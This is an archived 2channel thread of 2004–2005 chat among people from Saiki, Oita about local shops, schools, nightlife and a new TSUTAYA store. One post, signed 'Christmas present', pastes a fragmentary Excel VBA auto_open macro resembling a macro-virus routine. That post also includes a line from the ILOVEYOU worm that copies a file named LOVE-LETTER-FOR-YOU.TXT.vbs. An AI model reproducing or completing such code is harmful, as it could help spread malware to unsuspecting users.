2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大分県佐伯市民集合(。・_・。)ノ

1 :名無しさん@3周年:04/12/10 09:01:43
マイナー佐伯市民に2chネラーは何人いるのでしょうの集い。(。・_・。)ノ

2 :ぐり ◆5CCOcOK5UM :04/12/10 10:59:44


3 :名無しさん@3周年:04/12/10 11:32:01
マイナー過ぎ

4 :名無しさん@3周年:04/12/10 12:22:36
年代別じゃないじゃん
佐伯の議員さん、ダメダメばかりですね。

11 名前: 名無しでよか? 投稿日: 2004/11/30(火) 12:12:13 ID:MYY.TeHo [ 101.suba401.attnet.ne.jp ]

新市の議員報酬アップを要求、結果次第で合併ほごも−−佐伯市議会
http://www.mainichi-msn.co.jp/chihou/oita/news/20041127ddlk44010335000c.html


5 :名無しさん@3周年:04/12/10 14:03:07
4 すんまそ。他でスレ立てれなかったもんで…。(´Д`) 年々佐伯落ちぶれておりまつ(―_―メ)佐伯企業どんどん潰れておりまつ。

6 :名無しさん@3周年:04/12/11 08:53:43
やっぱマイナー過ぎかすら?集まらないわこのスレ( ̄□ ̄;)!!淋しいから一人でカキコするわ( -_-)

7 :名無しさん@3周年:04/12/11 10:19:07
誰か鶴城の近くの七福まだあるか知りませんかー?

8 :名無しさん@3周年:04/12/12 08:42:22
今日も誰も来ないわ…一人カキコで1000をめざすわ。

9 :名無しさん@3周年:04/12/12 08:44:48
(゜д゜)ノ

10 :名無しさん@3周年:04/12/12 18:54:45
7へ。
七福ばりばり営業中だよー!相変わらず焼くの遅いけど・・・。
この前昼間行って扉開けたらおっちゃんがAV見てた!「おおっと。」って言って
すぐ停止してたけど。

11 :名無しさん@3周年:04/12/12 19:31:04
お初佐伯人いらさ〜い!!@(・∇^)‥。・゚☆゛゛うれしいっす(≧Д≦)あのスキンヘッド今でもやってるのですね、やってるのですね!!

12 :名無しさん@3周年:04/12/12 19:34:23
夏場は、あのレトロなかき氷機で、こぼさず食べるのがむつかしいくらいてんこ盛りのフラッペが、今でも食べれるのですね、ですね(≧∀≦)

13 :名無しさん@3周年:04/12/12 19:40:21
10さん是非ともまた、このスレに来てくださいませ。m(__)mさみ死すぎて欝はいるとこでした(´Д`)ノさあ!佐伯人どんどん来いっ(ノ><)ノカマーン

14 :名無しさん@3周年:04/12/13 21:35:45
る〜る〜るる〜( -_-)Vξ今日もまたひ〜とり〜。 さびし〜いな〜またひ〜とり〜φ(.. )

15 :名無しさん@3周年:04/12/13 21:37:47
(´д`)y=~〜はぁ〜つまんね〜ょっ…(゚д゚)、ペッ

16 :名無しさん@3周年:04/12/13 22:27:03
皆、携帯でゲーム・対戦ぐるじゃむやろうじぇ〜(`Д´)q

17 :名無しさん@3周年:04/12/13 22:30:00
20(σ゚д゚)σゲッツまで頑張るぜ♪

18 :名無しさん@3周年:04/12/13 22:30:56
(´д`)y=~〜ひまちん

19 :名無しさん@3周年:04/12/14 00:43:32
20目前(ノ・◇・)ノ

20 :名無しさん@3周年:04/12/14 00:45:03
20(σ゚д゚)σゲッツ うれしくねぇよぉ〜 (ο__)ノノノ☆バンバン

21 :名無しさん@3周年:04/12/14 08:57:45
皆同窓会なんてやってんのかなー(^^)Y☆Y(^^)消防・厨房の時のなんて一度も無いなー(´Д`)

22 :名無しさん@3周年:04/12/14 09:08:29
こちらにもどうぞ↓

■☆★合併間近【大分県佐伯市のスレ】No.24★☆■
http://kyusyu.machi.to/bbs/read.pl?BBS=kyusyu&KEY=1101638769&LAST=100

23 :名無しさん@3周年:04/12/14 09:24:08
オフ会なんてやった日には、マイナースレでは、一人オフ会だねまったく(´・ω・`)ショボーン

24 :名無しさん@3周年:04/12/14 16:07:51
七福かあ。
鶴城の体育科でいっぱいで、怖くて入れなかった思い出が。
それきり縁がなくて行ってないなあ。

25 :名無しさん@3周年:04/12/14 17:31:48
今の鶴城生ってどうなのかね?

26 :名無しさん@3周年:04/12/14 19:18:44
七福と言えば鶴城生!たしかに体育科多かったですな。今も体育科ってあるのかな?無くなるって噂聞いてからその先知らんのよ…。佐伯出てから長いもんで。

27 :名無しさん@3周年:04/12/14 19:24:41
》22のスレのぞきました。カキコしようと思ったけど、メルアド入れないといけないの?しかも荒れスレでちと怖かった。・゚・(ノд`)・゚・。ワタスは、この自スレでマターリしときます。皆マターリ遊びに来てね@(・∇^)‥。・゚☆゛゛

28 :名無しさん@3周年:04/12/14 21:36:57
あぁ懐かしや(´Д`)そう言えば、昔子供の頃、仲町の夜市って活気があって、楽しみだったのにな〜少しづつ夜店も出なくなり、寂びれてしまったよなー。まだ寿屋も現役だったし…。

29 :名無しさん@3周年:04/12/14 21:40:15
暇なので、自分に名前を付けてみよう(`Д´)q う〜ん……(´д`)y=~〜

30 :どんこ:04/12/14 21:44:01
いかにもっって感じなのでこれにしよう。(ο__)ノノノ☆バンバン

31 :どんこ:04/12/14 21:46:39
↑いつのまにか30ゲト ( ̄□ ̄;)!!

32 :どんこ:04/12/14 21:51:42
佐伯に何処かオススメの飲み屋無いでしか?居酒屋でもBARでもいいんだけど…。

33 :どんこ:04/12/14 21:54:44
誰か、佐伯に「春夏秋冬」て美容室が出来たって聞いたけど、行ってみた人いませんか?

34 :どんこ:04/12/14 21:58:04
誰か、佐伯にニューハーフの店有るか知ってる人いませんか?無いのかな?オカマバーって大分市内とかなら有るのかな?

35 :どんこ:04/12/14 22:01:33
だ〜れ〜か〜(>o<)ゝ

36 :名無しさん@3周年:04/12/15 09:13:23
佐伯市の飲み屋街って新町でしたっけ?
普通のスナックしかないんじゃないかなー
さすがにニューハーフの店なんてないよ。

37 :どんこ:04/12/15 09:21:36
やっぱしぃ(´・ω・`)ショボーン新町ってうまいもん通りとかって名前かわったんだよね。

38 :名無しさん@3周年:04/12/15 10:57:10
新町あったよ。おかま(見た目はどうみてもふつーの着物着たおばさん)のやってる店、
あと、店員に女のかっこした男の子がひとりいる女性向けの店
(ここは仕事帰りのホステスさんがよく寄っていた)なら・・。
でも10年くらい行ってないから現在もあるのかどうかはわかりません。

39 :名無しさん@3周年:04/12/15 11:49:55
うまいもん通り
http://www.city.saiki.oita.jp/06youkoso/06_02umaimon/06_02a_kaisen/06_02a_04umai/umai.html
正月はさすがに閉まってるんだろうな。
帰省した際に行きたかったんだが。

40 :どんこ:04/12/15 12:45:36
10年前におばさんのカマーと言うことは…ばあさんカマー と言うことですな。まだやってたらいいなー。どこにあったの?

41 :どんこ:04/12/15 12:58:34
そうそう、ぱぶ茶屋の下に友達の兄がやってるBarがあるので皆行ってみてね!店の名前忘れたけど(。。;)

42 :名無しさん@3周年:04/12/15 13:56:02
>どんこ サマ
新町とうまいもん通りは別物です。隣の通りです。
新町はまだありますよ。

43 :どんこ:04/12/15 16:35:37
Σ(゚д゚V)エッ!そうなんですか!てっきり新町の名前が変わったんだと思ってた…。

44 :名無しさん@3周年:04/12/16 02:55:44
>>33
行ったことあるけどもうあそこずいぶん長いよ?
東京青山で働いてただけあってカットうまいと思いました
ただ店長のキャラ的に・合う人と合わん人とわりとはっきり別れるだろな〜

45 :どんこ:04/12/16 08:59:10
どこらへんにあるの?駅前近く?分かりやすい所?

46 :どんこ:04/12/16 09:06:36
佐伯に住んでた頃は、元リバティー・現ポートベローに行ってたなー。藤○さんが独立してなんちゃら覚えられない名前の所に、帰省したら行ってたけど。

47 :どんこ:04/12/16 09:13:50
ていうか、》44店長は、何キャラなのでしょうか?

48 :名無しさん@3周年:04/12/16 09:53:29
>>27
ほんと、まちBBSよりこっちの方がマターリできそうですね。
といわけで、佐伯・宿毛航路再開あげ

49 :名無しさん@3周年:04/12/16 10:03:02
>>45
市役所のそば「和楽」側。キャラは・・アーティスト型職人系?

50 :名無しさん@3周年:04/12/16 16:37:16
>>43
グリコとかどんどん安とかの通りがうまいもん通りです。
幹線道路から新町側に一本入った道ですね。

51 :どんこ:04/12/16 16:47:02
》49          ありがとう(゜∀^)…☆美容師さんは、個性強い人が多いって言うけど、東京から来た人……興味あるぅぅ〜ぅ(ο__)ノノノ☆バンバン

52 :どんこ:04/12/16 18:23:22
》50ふむふむφ(.. )我が町佐伯も長い事留守にしてると、分からなくなるもんですね。大分弁も忘れかけてるし…。10年一昔とは、本当だな。

53 :どんこ:04/12/16 18:44:40
久しぶりに、花桐のパフェ食いてぇっす!花火バチバチの花桐パフェ(ノ・◇・)ノ 今でも有るのかな〜?

54 :名無しさん@3周年:04/12/17 03:18:24
>>53
ああ、なんか若いコがきゃぴきゃぴ(死語)食べてたっけなぁ(現在もあるかどうかは未確認)
あそこはなに頼んでもボリュームでかいんだよね!

55 :名無しさん@3周年:04/12/17 14:03:05
すげえ50こえた

56 :どんこ:04/12/19 04:20:14
》55 50こえたけど、ほぼ、私のカキコばかりでし。

57 :どんこ:04/12/20 21:57:41
昨日、母上がお船に乗って、どんぶらこ×Aと遊びに来ました。今日、某イルミネーションを見て帰りました。久しぶりに佐伯弁戻りました。

58 :名無しさん@3周年:04/12/21 16:30:43
イルミネーションって、寿屋廃墟跡でやってんの?

59 :名無しさん@3周年:04/12/21 16:36:14
このスレでメンヘラぶってると簡単に女が釣れますよ。
http://jbbs.livedoor.jp/bbs/read.cgi/sports/19693/1103555702/


60 :どんこ:04/12/21 20:43:51
佐伯で見れるイルミは、何処に有りますか? 59《 いてみたら変なとこ着いた…( -_-)毎日爆睡のどんこには解らない世界。

61 :どんこ:04/12/21 20:48:49
↑↑↑↑↑↑↑↑↑↑↑あぁあぁあぁあぁあぁあ(σ゚д゚)σゲッツ(σ゚д゚)σゲッツ(σ゚д゚)σゲッツ(σ゚д゚)σゲッツ60(σ゚д゚)σゲッツ

62 :どんこ:04/12/21 20:51:22
あっずれた…( ̄□ ̄;)!! ばりブルー(´д`)y=~〜

63 :どんこ:04/12/22 15:26:37
お昼にカキコしてる人は、ヤパーリ仕事でパソ使う人なのかしらんφ(.. )

64 :どんこ:04/12/24 09:14:37
今日は、イヴだぁ。仕事して寝るか…( -_-)最近またこのスレ、ワンマンショウになりつつあるし…   (´д`)y=~〜

65 :名無しさん@3周年:04/12/24 15:57:21
今日から市内、すっごい車混んでるよう・・(泣

66 :xマスプレゼンポ:04/12/24 17:26:24
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

67 :どんこ:04/12/24 18:03:38
66》意味解らねぇ    (´д`)y=~〜 読めねぇ

68 :どんこ:04/12/25 08:48:57
誰か〔うみたま〕行った人いますかぁ?

69 :名無しさん@3周年:04/12/28 08:54:48
>>68
(^^)ノ おるよ。高崎山とあわせると一日つぶせるじょ。

70 :どんこ:04/12/31 10:58:13
今日、佐伯上陸!うみたま行ってみますぅ

71 :どんこ:05/01/03 01:42:57
うみたま制覇!すげいなあかなり遊べる!さすがに薄ら雪の積もった高崎山には行かなかったが(>ω<)よかったよかった。

72 :どんこ:05/01/12 09:15:01
いつのまにやら、さぶーいスレになってるわ。スレ立て人自身来てなかったし…(;´Д`)なんやら書き込む事も無くなって来たんだよにゃー。

73 :どんこ:05/01/12 11:44:51
同窓会に行ってきまーした♪(^^)Y☆Y(^^)私、どんこ。はしゃぎ過ぎて二次会からゲロりまくりで、便器と仲良し(´Д`)あぁぁ 海にもお裾分けしました それでも三次会GO!GO!GO!久しぶりにはめはずしたぁー(ο__)ノノノ☆バンバン

74 :どんこ:2005/03/24(木) 08:33:29
最近、携帯のゲームにはまって忘れてた、ここの存在…。て言うかまだある事にびっくしΣ(゚д゚V)エッ!しかもタイムカプセル。

75 :名無しさん@3周年:2005/03/29(火) 19:14:14
山姿 舞鶴に似たりとて
負う名 ゆかしい鶴谷城
その城東の学び舎に
自治と親愛、剛健の
理想に燃えて 若人が
日夜、技を練り、文を練る

76 :あっこ:2005/05/04(水) 00:40:12
↑やべ〜描く城校歌じゃん!!
なち〜

77 :けい:2005/05/22(日) 19:54:21
誰かいない?

78 :名無しさん@3周年:2005/05/22(日) 22:55:51
初めてのカキコです。

79 :名無しさん@3周年:2005/05/22(日) 22:57:19
↑って遅すぎたかなぁ〜><??

80 :けい:2005/05/22(日) 23:14:53
誰かいた!

81 :けい:2005/05/22(日) 23:18:14
ツタヤがオープンしたら行きたいけど人がゴタゴタになるんだろぅなぁと思う今日この頃です(゚∀゚)ノシ

82 :名無しさん@3周年:2005/05/23(月) 22:26:49
本当ですね...今でもセール中なんて警備員も大忙しなくらいすごい人なのに...
ってサンホームの95円セールっていつなんですか??そっちに行った方がいいかなぁ??

83 :けい:2005/05/24(火) 00:41:36
サンホームはいつだろうね??(゚劭)??
サンホームは結構好きです。あんまり人混まないし料金も安めだから。
BOMのセール時はレジ前に長蛇の列が…orz


84 :名無しさん@3周年:2005/05/24(火) 01:12:58
本当に端から端まで並んでますもんね...なんでtsutayaになるんだろ..?
前あったボムの掲示板ももうなくなったし。

85 :けい:2005/05/24(火) 20:29:32
ボムの掲示板よく見てたけど店員のクレーム多かったなw
ツタヤは携帯ホームページや掲示板あるのかな?
ってここ過疎スレだね…

86 :名無しさん@3周年:2005/05/24(火) 23:26:31
佐伯で2チャン見てる人どれくらいいるんだろう。。。??
私達二人だけでしょうか??
あと、ツタヤのカード作るのすっごくすっごくややこしいです!!!
個人情報も糞もない!!

87 :けい:2005/05/25(水) 01:40:14
2chで佐伯市スレはここしかないの?
ツタヤのカード普通の作ったけど一週間位休みなら直前に借りればよかった…orz
って店、青い外観と思ったらシルバーだったんですね。

88 :どんこ:2005/06/09(木) 00:46:57
久々にどんこ登場!ぽちぽち、人来てたんだなー(・ω・)人(・ω・)誰?誰!挌城校歌書き逃げしたのは!ヽ(`Д´)ノなつかすぃ。

89 :どんこ:2005/06/09(木) 00:50:50
佐伯にもツタヤできたんだー佐伯変わってきたかなー(・ω・)y─┛~

90 :どんこ:2005/06/12(日) 21:38:49
90ゲト!祝(`∀´ゞ-☆鳥肌実ラブな人書き込み待つ(「・_・)

13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)